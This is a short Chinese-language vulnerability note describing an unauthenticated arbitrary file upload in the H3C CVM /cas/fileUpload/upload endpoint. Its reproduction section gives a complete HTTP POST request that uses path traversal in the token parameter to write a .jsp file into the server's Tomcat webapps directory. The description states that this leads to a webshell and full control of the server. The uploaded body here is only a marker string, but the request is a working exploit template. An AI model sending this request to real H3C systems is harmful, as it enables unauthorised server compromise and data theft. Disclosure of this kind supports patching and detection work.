0x01漏洞描述
H3C CVM /cas/fileUpload/upload接口存在任意文件上传漏洞,未授权的攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等
0x02漏洞复现
POST /cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/c.jsp&name=123 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
Accept: /
Accept-Language: en
Accept-Encoding: gzip, deflate
Content-Range: bytes 0-10/20
Connection: close
fiigfgm